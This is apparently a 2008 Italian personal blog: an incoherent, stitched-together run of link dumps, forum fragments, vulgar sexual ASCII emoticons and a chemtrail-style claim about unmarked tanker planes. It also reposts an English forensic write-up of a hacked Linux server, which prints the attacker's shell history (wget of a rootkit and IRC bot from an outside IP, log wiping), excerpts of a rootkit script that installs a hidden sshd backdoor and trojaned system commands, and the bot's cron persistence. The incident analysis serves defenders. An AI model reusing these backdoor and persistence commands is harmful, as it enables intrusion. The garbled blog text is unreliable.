IDS intrusion detection system programmazione stasera

Posted on September 16, 2008 by alitaliaxyz

pig intrusion

programma chat open source
http://www.zpoc.com.br/
IDS ingegneria dei sistemi
http://www.ids-spa.it/
tecniche hacker programmazione
IDS intrusione detection system
http://www.google.it/search?hl=it&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=IDS+intrusion+detection+system&spell=1
http://it.wikipedia.org/wiki/Intrusion_detection_system
http://en.wikipedia.org/wiki/Intrusion-detection_system
http://netsecurity.about.com/cs/hackertools/a/aa030504.htm
addirittra una suite
http://www.intrusion-detection-system-group.co.uk/
come disassembleremo in ottetti
I would like to begin with the so called Payload Signatures. Here is part of a packet payload:

00 00 00 00 E9 FE FE FF FF E8 E9 FF FF FF E8 4F ……………
0 FE FF FF 2F 62 69 6E 2F 73 68 00 2D 63 00 FF FF …/bin/sh.-c…
http://www.linuxfocus.org/English/July2003/article294.shtml
Home
Intrusion Detection Systems List and Bibliography
http://www-rnks.informatik.tu-cottbus.de/en/node/209
http://www.tech-faq.com/lang/it/ids-intrusion-detection-system.shtml&usg=ALkJrhhhhe_j0svRheVKZiajRjQJdD4G6Q

Posted in Generale | Comments Off

inst arch linux l amore non corrisposto

Posted on September 15, 2008 by alitaliaxyz

http://www.youtube.com/watch?v=OQgxE_G0Ma4

hostess trovami un modo semplice per uscirne

http://www.rivistainnovare.com/pdf/2007-4.pdf

http://it.youtube.com/watch?v=5oY8ZcdGyb

http://operemusicali.siae.it/OpereMusicali/musicaSearch.do
http://www.kongregate.com/games/bontegames/duck-think-outside-the-flock

scherzo finto donadoni a ll alitalia

http://it.youtube.com/watch?v=gYjx_2FzQxw&feature=related

d amore e d anarchia

http://it.youtube.com/watch?v=qVaXW4DpCdg

parlami d amore

http://it.youtube.com/watch?v=5oY8ZcdGybs&feature=related

hostess trovami un modo semplice per uscirne

http://it.youtube.com/watch?v=5oY8ZcdGybs&feature=related

parlami d amore birikina88 professione hostess di bordo

http://it.youtube.com/user/birikina88

Libri: Quelli di Federico Moccia!!!

Sito web: http://vale88c.spaces.live.com

Segnala violazione dell’immagine del profilo

http://it.youtube.com/user/urbannme1346

http://it.youtube.com/user/babi88

angel&airwaves

http://it.youtube.com/watch?v=lwfT0okfmEY

http://it.youtube.com/user/birikkina

aerei cisterna o scie?

-citazione-

Ma da dove partono tutti questi fantomatici aerei?

Quante persone, piloti, assistenti di volo, assistenti di terra, sarebbero coinvolte?

…Attorno agli aeroporti ci sono insediamenti civili, ci sono case, c’è gente in grado di vedere.

Un traffico così grande di aerei cisterna, bianchi, senza insegne, qualcuno lo dovrebbe pur notare, no?…

Quante persone ne siano coinvolte io non posso certo saperlo, ma che questo traffico sia stato notato è un dato di fatto; esiste infatti una denuncia del SULTA (il sindacato dei controllori di volo) che riporta esattamente il transito di aerei militari privi di insegne identificative e dui non è dato sapere ne i piani di volo ne il contenuto di ciò che trasportano, proprio per il loro carattere militare. La denuncia mette in risalto la pericolosità di queste attività, perchè in caso di materiali pericolosi e contaminanti si potrebbero mettere in serio pericolo tutte le attività civili dell’aereoporto. La denuncia è pubblica e reperibile su internet, ne viene mostrata una parte sul cortometraggio: “Guardate il cielo” che trovi su Arcoiris.tv

http://www.cittadiariano.it/index.php?option=com_content&task=view&id=356&Itemid=94

foto interno aereo alitalia

http://www.passionevolo.com/tag/volo/

video di linea aerea pakistana

http://it.youtube.com/watch?v=ZzfJohgGxq0&eurl=http://www.passionevolo.com/tag/volo/

elta air line

http://it.youtube.com/watch?v=MgpzUo_kbFY&feature=related

fptp nel wc touilett hostess

http://it.youtube.com/watch?v=8zawy8FMqlM&feature=related

Caricamento in corso…

Avril Lavigne – Innocence Music Video

http://it.youtube.com/watch?v=TDRT-bYRvMI

http://it.youtube.com/watch?v=5oY8ZcdGybs&feature=related

http://it.youtube.com/user/birikkina

**************************************************************************************************************************************************************************************

il paese dei tecno cretini

http://www.math.unipd.it/~favero/forum/msrifl.html

stop alla diffusione della ricerca informatica?

http://www.consulentelegaleinformatico.it/approfondimentidett.asp?id=115

http://clic.noblogs.org/post/2008/09/15/aggressione-razzista-a-dottorando-di-tor-vergata

da un tecnico di benevento intervista a un hacker norvegese che ha decripato il dvd

http://www.megalab.it/2418/commenti

In poche parole, l’High Performance Computing Center di Maui è un luogo unico,

un posto dove l’intelligente cultura della scienza e dell’ingegneria si mescola

pacificamente con l’atteggiamento rilassato delle isole hawaiiane. Come sintetizza

felicemente uno slogan apparso nel 2000 sul sito web del laboratorio locale: "L’informatica in paradiso".

http://it.wikisource.org/wiki/Codice_Libero/Sant%27Ignucius

i monopoli elettronici

/public/Granieri%20e%20pardolesi%20su%20at%20e%20ip.pdf – Pagine simili

Monopoli elettronici e utilizzazioni libere nel diritto d’autore …

(e del digitale in genere) che potessero minacciare il controllo tecnologico delle opere oggetto ….. e infine per casi di reverse engineering di software, …

works.bepress.com/cgi/viewcontent.cgi?article=1003&context=mazziotti

Il “Signore degli anelli” nel ciberspazio: controllo delle

informazioni e Digital Rights Management*

Roberto Caso

http://eprints.biblio.unitn.it/archive/00001133/01/Roberto_Caso.DRM.Signore_degli_anelli.pdf

informatica e diritto

DECOMPILAZIONE (REVERSE ENGINEERING) per … duplicazione può non essere tecnicamente necessaria per utilizzare un programma, basta una copia temporanea) …

www.lips.dist.unige.it/corsi/sisinf/2005/Informatica%20e%20diritto.ppt

http://www.autistici.org/sens/inf/quacasotrento.pdf

REVERSE ENGINEERING

oftICE (un po’ datato) e OllyDBG, ma va bene qualsiasi debugger.

How fast does Arch Linux install?

http://it.youtube.com/watch?v=rWRkho6OREQ&feature=related

film lamore non va in vacanza

http://it.youtube.com/watch?v=OQgxE_G0Ma4

Ovviamente strumento indispensabile, insieme ad un debugger/disassemblatore, sono ottime conoscenze di Assembly.

_________________

La prima cosa da avere sono ottime conoscenze di Assembly per fare del reversing…sempre su quequero, e anche su giobe2000, trovi ottime guide all’Assembly x86 per Windows, e in rete trovi anche la guida di Ralph Brown con la lista completa degli interrupt BIOS e DOS usati in Assembly. Parti da lì, e dopo magari prova ad addentrarti nel reversing armato di debugger.

_________________

Beh la EPROM del BIOS si può programmare come una EPROM normale Wink

C’è gente che sulla EPROM del BIOS è riuscita a mettere su Linux (cerca su YouTube ‘Linux BIOS’ Very Happy). Anche a me interesserebbe molto la programmazione del BIOS, ma finora non ho mai avuto tempo di approfondire..

E te pareva… ecco che a uno gli viene in mente una cosa teoricamente innovativa ed ecco che è già stata fatta e buttata su YouTube… tutto ciò e deprimente. Forse è meglio che torno a lavorarmi i distributori automatici.

http://hackerforum.devil.it/viewtopic.php?t=4802&sid=8137b000d989253f5b48beed1057d357

http://it.youtube.com/watch?v=QsW88Efgmlk

Posted in Generale | Comments Off

hacking porco masterizzare dvd watermark

Posted on September 15, 2008 by alitaliaxyz

ricerca da indirizzo
http://www.paginebianche.it/execute.cgi?ts=105&cb=8
css
http://meyerweb.com/eric/tools/s5/
http://en.wikipedia.org/wiki/Edward_Felten
http://topics.nytimes.com/top/reference/timestopics/people/f/edward_w_felten/index.html
http://www.nytimes.com/2008/02/22/technology/22chip.html?_r=1&oref=slogin
SDMI demands Princeton prof "destroy" paper about vulnerability
http://www.politechbot.com/p-01946.html
http://www.wired.com/politics/law/news/2001/01/41183
http://cryptome.org/sdmi-attack.htm
emilio fede
http://it.youtube.com/watch?v=3m6cyUtdjsQ
http://it.youtube.com/watch?v=qFYjcbgQZA0&feature=related
matrimonio alle bahamas
http://it.youtube.com/watch?v=mluMYGlHH8c
punti deboli schemi watermark filigrana digitale
http://www.dm.unito.it/personalpages/cerruti/studenti/Longhini/cap3.pdf
come masterizzare i cd e dvd protetti
punti deboli schemi watermark filigrana digitale
http://www.gxware.org/downloads/pdf/masterizzare.cd.dvd.protetti.gxware.org.pdf
http://www.autistici.org/sens/inf/gxware.org.pdf
http://it.youtube.com/watch?v=ij0bVw3jovo&feature=related

da lista kernel

http://www.cisco.com/en/US/tech/tk827/tk369/technologies_tech_note09186a008048cffc.shtml#t6

Ufficio Stampa

Copyleft Festival

Silvia Poledrini

+39 349 4763830

sil…@copyleftfestival.net

www.copyleftfestival.net

yoga ogni giorno un video

http://www.yogatoday.com/

http://www.yogatoday.com/images/titles/title_upcoming_yoga.gif

http://www.freesklyarov.org/

http://www.usdoj.gov/criminal/cybercrime/Sklyarov.htm

Materiale sul software libero

Ospitato da ILS presso www.linux.it/GNU/.

Ospitato da AsSoLi presso www.softwarelibero.it/GNU/.

Ospitato da Prosa presso www.prosa.it/philosophy/.

Non più manutenuto da Alessandro Rubini, si cercano volontari.

http://news.zdnet.com/2100-9595_22-116424.html?legacy=zdnn

http://punto-informatico.it/112678/PI/News/sklyarov-mosca-ho-vinto-io.aspx

http://www.wired.com/politics/law/news/2001/12/49272

esprit hacker

http://www.google.it/search?hl=it&q=esprit+hacker&btnG=Cerca+con+Google&meta=

http://www.desitwist.com/mobile-esprit/hacker-cracks-itunes-codes-21136.html

ebbene si ci vorrebbero pannelli solari villa piscina per sconfiggere lo spionaggio

industirale un nestricke campagnolo e forse in futuro sarà così l arcadia

http://hackaday.com/2008/03/26/cat-5-ethernetserialpoe-to-your-wireless-router/

60 Watt solar panel built from cells

posted Sep 14th 2008 7:04pm by Jason Rollette
filed under: misc hacks, peripherals hacks

<!–[if gte mso 9]> Normal 0 <![endif]–>

Our love for solar projects continues on with this method to make your own solar panels. [Mike] built a 60 watt solar panel from individual solar cells he purchased off eBay. Procuring parts off of eBay normally causes others hardship when they try to duplicate the project, however in this case there are so many types of cells people can use to produce their own unique solar panel. Even cells that are extremely damaged my still be used, as in this example. To charge a 12 volt battery the number of cells in series just needs to be 16-18 volts, and the rest in parallel will supply more current. Charging a battery without a charge controller is not recommended, but commercial ones are easily had. Those not interested in jumping all the way in with solar may want to test the waters by building their own panel and putting it to use as a charging station for your portable gadgets.

http://hackerdpua.blogspot.com/2008/08/arcadia-lift-off-or-full-speed-ahead.html

florida java scripti e video freddi in you tube

http://articles.directorym.net/JavaScript_Hacking_Florida-r908878-Florida.html

il primo hacking? lo ha fatto leonardo da vinci

Il termine hacking è uno dei più inflazionati vocaboli legati all’informatica; avendo accompagnato, fin dall’inizio, lo sviluppo delle tecnologie di elaborazione e comunicazione dell’informazione, ha assunto diverse sfumature a seconda del periodo storico e dello specifico ambito di applicazione; in ambito tecnico, lo si può definire come studio dei sistemi informatici al fine di potenziarne capacità e funzioni.

Sebbene venga usato principalmente in relazione all’informatica, l’hacking non è limitato ad un particolare ambito tecnico, ma si riferisce più genericamente ad ogni situazione in cui si faccia uso di creatività e immaginazione nella ricerca della conoscenza: ad esempio, Leonardo da Vinci può essere considerato un hacker del XV secolo. Inoltre, in lingua inglese, il termine assume un gran numero di significati, tra cui il lavoro come tassista, una categoria di videogiochi, un’azione del rugby, nonché alcune espressioni dialettali dello slang inglese. Chi fa hacking viene chiamato Hacker; è più un’approvazione che deriva dall’esterno piuttosto che un nome di cui ci si fregia autonomamente. Per l’hacker è fondamentale conoscere accuratamente il sistema su cui interviene, per poter essere in grado di adattarlo alle sue esigenze; qualora le informazioni tecniche vengano nascoste da chi realizza il sistema (produttori hardware, ma anche software), l’hacker si dedica alla sua analisi, raggiungendo la conoscenza attraverso la sperimentazione sul campo: l’hacking è visto come uno strumento per ottenere informazioni e conoscenze che, seppur protette, si presumono appartenere alla comunità. L’hacking può essere visto come un puro strumento e come tale, a seconda di chi lo usa e del motivo per cui lo usa, può assumere valenze positive o negative. Il motivo principale di chi pratica l’hacking è senza dubbio la curiosità, rivolta sia verso i propri sistemi informatici (che si vogliono conoscere col massimo dettaglio), sia verso altri sistemi (che possono contenere informazioni che per qualche motivo si reputano interessanti). È usato anche come strumento di test: società che realizzano sistemi informatici spesso assumono hacker noti per sfidarli a trovare debolezze nei loro sistemi, per dimostrare la loro affidabilità; di tanto in tanto vengono indette competizioni in cui viene premiato chi riesce a violare il sistema. L’affidabilità di questi test, in realtà, non prova l’assoluta robustezza del sistema, ma soltanto il fatto che in un ristretto periodo di tempo chi ci ha lavorato non è riuscito a scoprire alcuna vulnerabilità.La pratica di accedere illegalmente a sistemi altrui (per qualsivoglia motivo) usa mezzi e tecniche proprie dell’hacking, ma se ne differenzia profondamente: mentre l’hacker cerca la conoscenza, il cracker mira alla devastazione e al furto. Chi pratica l’intrusione informatica semplicemente copiando le tecniche trovate e sviluppate da altre persone sfruttando exploit già pronti, viene chiamato lamer o script kiddie, termini assolutamente dispregiativi.

< Prec.		Pros. >

http://www.azine.it/index.php?option=com_content&task=view&id=290&Itemid=55

un po di ridere ma volgare

Se i mod pensino sia una kosa troppo volagre kiudete….
ma fa troppo ridere….

🙂 Sorriso
😉 Strizzatina d’occhio
:O Urlo
:*) Ubriaco
<|-) Cinese
:@) Maialino

<> figa
<*> figa con clitoride
C=8 *****
C8 ***** moscio
–C=8 orgasmo maschile
:-O=8 pompino
C=8:-) testa di *****
:C=8) faccia di *****

3= scureggia
3- *******
3=8 a pecorina
3: emorroidi
:-O= rutto
]:-I cornuto
:-d arrapato

(_!_) un culo normale
(__!__) un culo grasso
(!) persona che vuole fare credere che ha un buco del culo stretto..
(_._) un culo piatto
(_*_) un culo con piccole ferite attorno per una inculata…
{_!_} un culo con le pieghe
(_o_) un culo con molto chilometraggio
(_O_) un culo con molto chilometraggio in più;
(_x_) un culo aggrinzito
(_X_) un culo chiuso…vietato..
(_$_) il culo di bill gates
[_T_] un culo molto quadrato
(_:_) un culo molto raro
(_@_) un cyberculo
(_?_) un culo misterioso
(__) un culo senza uscita

(o)(o) tette perfette
(+)(+) tette finte, di silicone
(*)(*) tette con capezzoli in alto
(@)(@) tette con capezzoli molto grandi
(oYo) tette perfette per fare una spagnola
(^)(^) tette con freddo
(o)(O) tette dispari, differenti una dell’altra
(p)(q) tette strabiche
o/o/ tette della nonna
( – )( – ) tette schiacciate contro un vetro
|o||o| tette androidi
( o Y o ) tette per Playboy

Distinti saluti killer manu

__________________

http://www.psphacker.org/forum/off-topic/4238-un-po-di-ridere-ma-volgare.html

be insomma la sapete la storiellina del filosofo con la barba le tette schiacciate

per visitare in monte athos e la slovena in crisi?

sulla mia tomba scrivete pure:

odiato da miss leone e dall avellino calcio perchè alto solo 1.75 e non poteva

partecipare con gli ungheresi berlusconi e fiuggi al calcio mediato

io hackit99 ….

dei rivoluzionari

della serie "e le stelle stano a guardare" il capo miniera pugliese rimane il boia

con tucci e moschella i boss del duce in locus antroici ad avellino

ma adda venì kropotkin ….

Posted in Generale | Comments Off

script k hackerantani amalfi scarlet johanson

Posted on September 14, 2008 by alitaliaxyz

Etimologia delle passioni

di Ivonne Bordelois

Prezzo: 13.00 Euro

Come un detective, Ivonne Bordelois, segue i percorsi delle parole sul tema delle passioni, in un libro che ha per oggetto il linguaggio ma non è un’opera di linguistica, parla d’amore ma non è né un romanzo né un trattato di psicologia. […]

News sul tuo sito

Vuoi avere le news di Apogeonline sempre aggiornate sul tuo sito? E’ semplicissimo: scopri come

Argomento: Hacker e Hacking.

BLACK WHITE HATS

http://www.apogeonline.com/webzine/2007/02/07/19/200702071902

http://fetish.noblogs.org/post/2008/09/14/sexy-dolls
http://it.youtube.com/watch?v=_6bFY7rsAjw&feature=related
ispezioni
http://it.youtube.com/watch?feature=related&v=QXk1VEaMJ18
http://it.youtube.com/watch?v=WVly4oN76mk&feature=related
http://it.youtube.com/watch?v=sB7B2CnzFRY&feature=related
http://it.youtube.com/watch?v=njMvWHnYL5U&feature=related
http://it.youtube.com/watch?v=MFoTSJ9TWOY&feature=related
http://lip.noblogs.org/post/2008/07/23/telefonia-e-messageria-su-internet
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=37506
script kiddie
http://it.wikipedia.org/wiki/Script_kiddie
http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci550928,00.html
15 minuti di notorietà
http://pcandother.forumcommunity.net/?t=14485510
script kiddie video
http://www.stumbleupon.com/tag/script-kiddie/
http://it.youtube.com/watch?v=Q2xdH7LHMPc
————————————————————————————————————————————————————————————————————————————
prima iscriversi he he
http://www.stumbleupon.com/sign_up.php?pre2=tag_addsite&tag=script-kiddie
script kiddie
http://it.youtube.com/watch?v=Q2xdH7LHMPc
script kiddie (ragazzino degli script) è un termine spregiativo, utilizzato dagli hacker,
per intendere una persona che si diletta a seguire pedissequamente le istruzioni,
senza capirle, e a copiare/modificare leggermente gli script creati da altri,
facendo intendere agli altri di essere un grande guru dell’informatica.

Il termine si sviluppa sul finire degli anni 90, quando la diffusione dei sistemi operativi open source e degli accessi privati ad internet iniziano ad allargare il pubblico di persone interessate al funzionamento dei Personal Computer, con il conseguente aumento di persone con pochi scrupoli e imitatori in cerca dei 15 minuti di notorietà.
un click e riesce a sfruttare il buffer overflow all’interno del software di upload delle immagini Aurigma ActiveX.
http://www.trackback.it/articolo/myspace-e-facebook-criminal-hackers-allattacco/4068/
bologna fisica nucleare
http://www.df.unibo.it/ricerca/annuario04/ric2.asp?sezione=2×21
http://www.computerhope.com/jargon/s/scriptki.htm
http://www.internet-guide.co.uk/script-kiddie.html
Most of these scripts are easy-to-use programs whereby the "script-kiddy" simply enters the IP address of the victim.
http://www.iss.net/security_center/advice/Underground/Hacking/Script-Kiddies/default.htm
http://www.tamingthebeast.net/articles/scriptkiddies.htm
http://spam.tinyweb.net/article.php/script-kiddie-and-ftp-link
chat e script kiddie 2003

Script Kiddies II – An advice to parents:

http://www.tamingthebeast.net/ articles/scriptkiddies2.htm

Script Kiddies III – Grill a kiddie!!

http://www.tamingthebeast.net/ articles/kiddies3.htm

Script Kiddies 2002 – an update

http://www.tamingthebeast.net/ articles2/script-kiddies-2002.htm

Michael Bloch
Taming the Beast
http://www.tamingthebeast.net

Posted in Generale | Comments Off

esempio art hacking frugalware live scarlett johansson

Posted on September 13, 2008 by alitaliaxyz

scarlett johansson hot blonde sexy baby figa da paura

farò quel che è giusto biondina…

e mi chiedo maria tu con le tue conoscenze,

la tua voglia di imparare il tuo stipendio ridotto

hostess all alitalia , apriresti una società grafica di tipo hacking

come ci sono in america?

ma quello c

calabresi prezzolato della cia
http://anarchicipistoiesi.noblogs.org/post/2008/09/12/e-silvio-subdolamente-invita-a-sparare-ai-comunisti-…
http://it.youtube.com/watch?v=Jb_t6veKM90&eurl=http://anarchicipistoiesi.noblogs.org/post/2008/09/12/e-silvio-subdolamente-invita-a-sparare-ai-comunisti-…

esidenza a roma

http://nulla.noblogs.org/post/2008/09/13/roma

frugalware

http://de-mirror.org/distro/frugalware/frugalware-0.9-iso/

anche live da poco

http://it.linux.wikia.com/wiki/Frugalware_Live

Certo la mancanza di strumenti per la gestione semplificata

delle connessioni è una pecca grossa che fa di

Frugalware un progetto ancora un pochino acerbo.

Ma credo che l articolo sia vecchiotto

http://frugalware.org/news.php

i link della live sono infatti qui dentro

http://frugalware.org/download/frugalware-0.9-iso/fwlive-0.9-i686-full.iso

dove si trova il live cd ?

http://www.frugalware.org/news/110

******************************************************************************************

esempio simile at hacking

script kiddie cracker
http://it.wikipedia.org/wiki/Script_kiddie
http://it.wikipedia.org/wiki/Backdoor
flaming
http://www.urbandictionary.com/define.php?term=script+kiddie
http://www.urbandictionary.com/define.php?term=script+kiddie
http://www.illegalworld.com/
http://www.sexole.com/webcam.aspx?promo=492
bel blog
http://lillistar.noblogs.org/post/2008/09/13/cambiamo-argomenti-tecno-filia
http://www.tv-live.it/radio/index.php
le vie del pericolo rc ftp
http://www.rootprompt.org/article.php3?article=756
softwatre
http://www.answers.com/topic/script-kiddie
e ci sono anche script che vulnerano le tv hahah
http://www.zdnet.com.au/news/business/soa/Turning-script-kiddies-into-real-programmers/0,139023166,120263061,00.htm?omnRef=http://www.google.it/search?hl=it
analisi di un attacco condotto male
http://blog.gnist.org/article.php?story=HollidayCracking

http://www.frugalware.org/download/frugalware-0.9-iso/fwlive-0.9-i686-full.iso

Welcome to Lars Strand
Saturday, 13 September 2008 @ 18:33 CEST

Holiday cracking

Monday, 09 April 2007 @ 19:17 CEST

Contributed by: lars

Update! 16. September 2007: I’ve posted a follow up on this story here.

A friend of mine asked me to have a look at his Linux-server. "It behaves strangely" he said, most notably the web-server apache refused to start. It turned out to be more than just a problem with apache.

I already had an account, so I started to poke around. The first thing I noticed was some strange ls behavior:

 lars@server1:~$ ls
ls: invalid option -- h
Try `ls --help' for more information.

That’s odd.. Why don’t "ls" take "-h" all of a sudden?? I had aliased "ls, so I unaliased it and it worked fine:

lars@server1:~$ alias ls
alias ls='ls -sh --color=auto'
lars@server1:~$ unalias ls
lars@server1:~$ ls
backup
lars@server1:~$

Strange. I’ll have too look into that later, but first get apache up and running:

 lars@server1:~$ sudo /etc/init.d/apache2 start
Password:
* Starting apache 2.0 web server...
(2): apache2: could not open error log file /var/log/apache2/error.log.
Unable to open logs
...fail!

Ookay..? A quick peek into "/var/log/" revealed that "apache2/" was missing, but so was all other directories usually found under there as "mysql/", "exim4/", "samba/" and so on. Something was wrong alright. Did my friend accidentally delete everything by mistake?? He claimed not to. I logged in as root to fix the missing directories:

 lars@server1:~$ sudo su -
Password:
root@server1:~# ls
ls: unrecognized prefix: do
ls: unparsable value for LS_COLORS environment variable
total 44
4 . 4 .bashrc 4 .ssh
4 .. 4 .lesshst 8 .viminfo
8 .bash_history 4 .profile 4 .vimrc

Even more "ls" trouble? Again, "ls" is aliased:

 root@server1:~# alias ls
alias ls='ls -sa --color=auto'
root@server1:~# unalias ls
root@server1:~# ls
root@server1:~#

By now, I really suspected that something was very very wrong. Misbehaving "ls" and missing a bunch of stuff under "/var/log/". My suspicion was confirmed when I examined root’s ".bash_history":

root@server1:~# cat -n .bash_history
...
340 w
341 cd /var
342 wget http://83.19.148.250/~matys/pliki/shv5.tar.gz
343 tar -zxf shv5.tar.gz
344 rm -rf shv5.tar.gz
345 mv shv5 .x
346 cd .x
347 ./setup zibi.joe.149 54098
348 passwd
349 passwd
350 ps aux
351 crontab -l
352 cat /etc/issue
353 cat /etc/passwd
354 w
355 who
356 cd /usr/lib/libsh
357 ls
358 hide +
359 chmod +x hide
360 hide +
361 ./hide +
362 cd /var/.x
363 mkdir psotnic
364 cd psotnic
365 wget http://83.19.148.250/~matys/pliki/psotnic0.2.5.tar.gz
366 tar -zxf psotnic0.2.5.tar.gz
367 rm -rf psotnic0.2.5.tar.gz
368 ls
369 mv psotnic-0.2.5-linux-static-ipv6 synscan
370 ./synscan
371 vi conf
372 vi conf1
373 mv synscan smbd
374 smbd -c conf
375 ls
376 ps aux
377 ls
378 ./smbd -c conf
379 ./smbd -c conf1
380 ./smbd conf
381 ./smbd conf1
382 ./smbd -a conf conf1
383 rm -rf conf.dec
384 rm -rf conf1.dec
385 cd /usr/lib/libsh
386 ./hide +
387 exit
...
425 ssh ftp@62.101.251.166
426 w
427 ls
428 ls
429 cd /var/.x
430 ls
431 cd psotnic/
432 ls
433 rm -rf /var/log/*
434 exit
435 ls
436 cd /var/.x/psotnic/
437 ls
438 vi conf2
439 ./smbd -c conf2
440 ./smbd conf2
441 ./smbd -a conf conf1 conf2
442 rm -rf conf2.dec
443 cd ..
444 ls
445 cd /usr/lib/libsh
446 hide +
447 ./hide +
448 exit
449 ps aux
450 cd /var/.x
451 ls
452 ls
453 cd psotnic/
454 ls
455 cat pid.MastaH
456 kill -9 2030
457 ./synscan -a conf conf1
458 ./smbd -a conf conf1
459 cd /usr/lib/libsh
460 ./hide +
...

Woha! The box had been cracked alright! I found this quite exciting, but obviously, my friend did not. The attacker did one elementary error by not wiping out ".bash_history" – so this is probably not the only error he/she has done. Let’s start dissecting this little crack.

First. What is hiding under "/var/.x/" and what does the command "setup zibi.joe.149 54098" do?

root@server1:/var/.x# file setup
setup: Bourne-Again shell script text executable
root@server1:/var/.x# wc -l setup
825 setup
root@server1:/var/.x# head -17 setup
#!/bin/bash
#
# shv5-internal-release
# by: PinT[x] April/2003
# 
# greetz to:
#
# [*] SH-members: BeSo_M, grass^, toolman, nobody, niceboy, armando99 
# C00L|0, GolDenLord, Spike, zion ...
# [*] Alba-Hack : 2Cool, heka, TheMind, ex-THG members ...
# [*] SH-friends: mave, AlexTG, Cat|x, klex, JinkS ...
# [*] tC-members: eksol, termid, hex, keyhook, maher, tripod etc..
# [*] And all others who diserve to be here but i forgot
# [*] them at the moment !
# 
# PRIVATE ! DO NOT DISTRIBUTE *censored*EZ !

Now, this little shell script does all kinds of nasty stuff, like installing a modified ssh backdoor disguised as "/bin/ttyload" which is then added to "/etc/inittab" for automatic startup at boot:

mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
chattr +isa /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1
....
# INITTAB SHUFFLING
chattr -isa /etc/inittab
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1
cat /etc/inittab |grep getty > /tmp/.init2
echo "# Loading standard ttys" >> /tmp/.init1
echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1

It also backdoor a bunch of standard linux commands:

# Backdoor ps/top/du/ls/netstat/etc..
cd $BASEDIR/bin
BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP
...
# ls ...
chattr -isa /bin/ls
cp /bin/ls $BACKUP
mv -f ls /bin/ls
chattr +isa /bin/ls

This explains why "ls" misbehavied!

root@server1:/var/.x# ls -l /usr/lib/libsh/.backup/
total 552
-rwxr-xr-x 1 root root 126276 Dec 24 22:58 find
-rwxr-xr-x 1 root root 59012 Dec 24 22:58 ifconfig
-rwxr-xr-x 1 root root 77832 Dec 24 22:58 ls
-rwxr-xr-x 1 root root 30388 Dec 24 22:58 md5sum
-rwxr-xr-x 1 root root 99456 Dec 24 22:58 netstat
-rwxr-xr-x 1 root root 65492 Dec 24 22:58 ps
-rwxr-xr-x 1 root root 14016 Dec 24 22:58 pstree
-rwxr-xr-x 1 root root 50180 Dec 24 22:58 top

Oh – and look at the timestamp. This was done at christmas!

Clearly the original "ls" and the newly installed "ls" are different, as md5 fingerprint and file shows:

root@server1:~# md5sum /usr/lib/libsh/.backup/ls /bin/ls
eef7ca9dd6be1cc53bac84012f8d1675 /usr/lib/libsh/.backup/ls
0a07cf554c1a74ad974416f60916b78d /bin/ls
root@server1:~# file /bin/ls
/bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked (uses shared libs), for GNU/Linux 2.0.0, stripped
root@server1:~# file /usr/lib/libsh/.backup/ls
/usr/lib/libsh/.backup/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.0, dynamically linked (uses shared libs), for GNU/Linux 2.6.0, stripped

The backdoor toolkit ("sh5.tar.gz") was downloaded from (local copy here):

root@server1:~# dig +short -x 83.19.148.250
4lo.bydg.pl.

I can’t make much out of the site, since it’s in polish. The attacker probably don’t have any connection to this site – I don’t think he is that foolish, but then again – he has done several severe mistakes.

The output of the "setup" command, as run by the attacker, can be seen in the screen shot (I was running this on sandboxed server at home):

Okay, so "zibi.joe.149" is the password and "54098" is the port number. It’s running and (old) sshd from ssh.com, as seen from the screen shot:

Nice colors.

The backdoor is installed. The next step is to install an irc-bot and make it an zombie. That is what "psotnic0.2.5.tar.gz" contains. The attacker extract and rename the irc-bot to "smbd", which happens to be the same as Samba’s daemons ("smbd" and "nbmd").

Next he creates two configuration files, which contains which irc-server to connect to, and which channel to join etc. The config files are then encrypted, and the clear-text ones are deleted:

 371 vi conf
372 vi conf1
....
378 ./smbd -c conf 
379 ./smbd -c conf1
380 ./smbd conf
381 ./smbd conf1
382 ./smbd -a conf conf1

Let’s execute command 382 to see what it does:

root@server1:/var/.x/psotnic# ./smbd -a conf conf1
Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49)
Copyright (C) 2003-2005 Grzegorz Rusin 
[+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1
[+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1
[+] Added 2 psotnics to cron

Aha! So it gets added to cron:

root@server1:/var/.x/psotnic# crontab -l
*/10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1
*/10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1

At this time I killed off the two hostile smbd-processes and disabled the cron-job. I fired up a tcpdump in another shell and started the two processes manually:

root@server1:~# cd /var/.x/psotnic; ./smbd conf
Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49)
Copyright (C) 2003-2005 Grzegorz Rusin 
[*] Acting as LEAF
[+] Config loaded
[+] Going into background [pid: 5724]
root@server1:/var/.x/psotnic# ./smbd conf1
Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49)
Copyright (C) 2003-2005 Grzegorz Rusin 
[*] Acting as LEAF
[+] Config loaded
[+] Going into background [pid: 5727]
root@server1:/var/.x/psotnic#

These two processes show up using (our backdoored) "ps", so I guess that why the attacker renamed it to "smbd":

root@server1:/var/.x/psotnic# ps axuw | grep smb
root 3799 0.0 0.4 8592 2156 ? S 11:00 0:00 /usr/sbin/smbd -D
root 3808 0.0 0.1 8592 896 ? S 11:00 0:00 /usr/sbin/smbd -D
root 5724 0.0 0.1 1648 772 pts/2 S 12:47 0:00 ./smbd conf
root 5727 0.0 0.1 1640 764 pts/2 S 12:47 0:00 ./smbd conf1

The first two are the real samba, the next two are the irc-bot. Let’s strace it to see what it does:

root@server1:~# strace -p 5727
...
connect(3, {sa_family=AF_INET, sin_port=htons(9714), sin_addr=inet_addr("83.18.74.235")}, 16) = -1 EINPROGRESS (Operation now in progress)
...
